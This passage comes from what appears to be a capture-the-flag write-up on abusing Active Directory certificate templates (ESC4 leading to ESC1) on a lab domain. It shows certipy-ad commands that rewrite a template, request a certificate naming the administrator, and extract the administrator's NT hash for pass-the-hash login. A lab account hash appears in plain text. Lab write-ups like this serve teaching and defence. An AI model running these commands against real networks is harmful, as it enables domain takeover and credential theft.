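    for label, tpl, groups in (("before", TEMPLATE_BEFORE, {"Domain Users"}),
                               ("after", TEMPLATE_AFTER, {"Authenticated Users"})):
        print(f"{label}: ESC1={is_esc1(tpl, groups)} blocked_by={failed_conditions(tpl, groups)}")
```

The `failed_conditions` output is the useful part for both sides: an attacker with ESC4 reads it as the list of attributes to flip, and a defender auditing a template sees which single change (here, the name flag) separates a safe template from one that issues certificates for administrator.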

export nt=3b181b914e7a9d5508ea1e20bc2b7fce   # ca_svc NT hash recovered by shadow auto
export KRB5CCNAME=$PWD/ca_svc.ccache
# ESC4: overwrite the template with an ESC1-style configuration (enrollee supplies subject, client-auth EKU, no approval)
certipy-ad template -k -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -target dc01.sequel.htb
# ESC1: enrol as ca_svc but put administrator's UPN in the SAN
certipy-ad req -u ca_svc -hashes $nt -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug
# PKINIT with the certificate: prints administrator's NT hash and saves a ccache
certipy-ad auth -pfx administrator_10.pfx -domain sequel.htb

With the NTLM hash obtained from the pfx certificate, log in over WinRM (pass-the-hash) and read the root flag.